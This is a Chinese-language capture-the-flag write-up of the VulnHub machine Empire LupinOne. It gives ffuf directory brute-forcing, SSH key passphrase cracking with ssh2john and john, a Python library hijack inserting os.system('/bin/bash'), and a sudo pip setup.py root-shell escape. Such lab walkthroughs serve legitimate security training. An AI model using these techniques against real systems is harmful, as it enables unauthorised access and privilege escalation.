[渗透测试学习靶机03] vulnhub靶场 Empire LupinOne

Kali 的IP地址：192.168.127.139

靶机的IP地址：192.168.127.142

一、信息搜集

1.1、扫描主机口

1.2、扫描端口

二、Web漏洞利用

2.1、目录遍历

2.2、破解私钥破解密码

2.3、尝试登陆

三、提权

3.1、提权到arsene

3.2、提权到root

一、信息搜集

1.1、扫描主机口

1.2、扫描端口

发现目标靶机开放了 22 (ssh) 、80（http）端口，我们默认访问80端口

http://192.168.127.142：80

发现页面没有啥东西，尝试看一下源代码

检查出现一句话" Its an easy box, dont give up. “意思是"它是一个简单的盒子，不要放弃。”

看另一个22端口是ssh的,现在没有账号密码无法使用。

二、Web漏洞利用

2.1、目录遍历

我们先扫描一下靶机的网站目录

发现有robots.txt，我们访问一下，发现有~myfiles文件夹，还有俩个名词，百度一下

试着访问~myfile这个文件夹，发现页面就是404，我们可以查看一下源代码，下面还有一个注释的话“你可以的，继续努力。”

让我们继续努力，就是暗示我们还有别的东西，紧接着我们尝试暴力破解，这里推荐使用ffuf工具暴力破解目录，kali自带的ffuf扫描速度贼快

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.127.142/~FUZZ'

参数解释：
-c 有颜色输出
-w 指定字典
-u 指定暴力破解的目录，FUZZ 就是暴力破解的目录

看见是一个~secret文件，我们访问一下

访问：http://192.168.127.142/~secret/

Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.I’m smart I know that.Any problem let me knowYour best friend icex64你好朋友，我很高兴你找到了我的秘密目录，我这样创建的，以与你分享我的ssh私钥文件，它就藏在这里的某个地方，这样黑客就不会找到它，用快速通道破解我的密码。我很聪明，我知道。有问题尽管来找我你最好的朋友icex64

我们猜测用户名是不是 icex64，用ssh私钥登陆，所以这里暴露了一个用户名 icex64 ，并且内容中提到该目录下有一个ssh私匙文件，这里可能需要暴力破解了

2.2、破解私钥破解密码

暴力破解文件继续使用 ffuf 破解，ffuz这个工具是可以自己选择后缀名的
尝试使用 kali 中的字典暴力破解

ffuf -u "http://192.168.127.142/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

扫描出来一个文件，我们接着访问一下

发现是一串乱码，看起来很像base加密，我们直接去base全家桶一个一个解密
发现base58可以解出来

我们将这个解密的文件保存下来（文件命名为ssh_txt），使用ssh密钥登陆，发现还需要一个密码，另外一个密码可以通过这个保存的文件密钥爆破出来

先用ssh2john.py 将ssh_txt更改为john可以识别的格式

命令：/usr/share/john/ssh2john.py ssh_txt > hash

之前~secret文件有叫我们使用fasttrack字典去爆破

然后利用john对 ssh_txt进行爆破。还原密码该字典文件应该是kali上自带的字典.

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

得到用户：icex64 的密码是：P@55w0rd!

2.3、尝试登陆

尝试使用私钥+密码登陆到系统中

尝试ssh登录（ icex64、P@55w0rd!）

ssh icex64@192.168.127.142 -i ssh_txt

登陆成功，查看家目录,发现有一个文件user.txt，得到一个flag

三、提权

3.1、提权到arsene

执行sudo -l发现arsene用户可以免密以root身份执行一个py脚本

User icex64 may run the following commands on LupinOne:(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py

紧接着我们查看一下这个文件，发现里面引入了一个包，我们可以看到heist.py脚本本身没有什么代码，但导入了一个模块：webbrowser

查看webbrowser.py脚本，发现有导入os模块

查看文件权限，发现可以修改

然后在上面插入一行进入bash的命令，插入os.system ("/bin/bash") 获取shell

重新切换shell，成功获取到arsene权限

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

3.2、提权到root

再次执行sudo -l发现可以以root身份免密执行pip，

然后我们使用pip进行提权，最终拿到flag，复制下面代码在 shell 中执行，成功提权，在 /root 目录下找到了flag（root.txt）

TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo pip install $TF

总结：

该靶机整体简单，重点在于ffuf 工具暴力破解目录，ssh2john工具的使用，使用 john 破解私钥，紧接着sudo：pip提权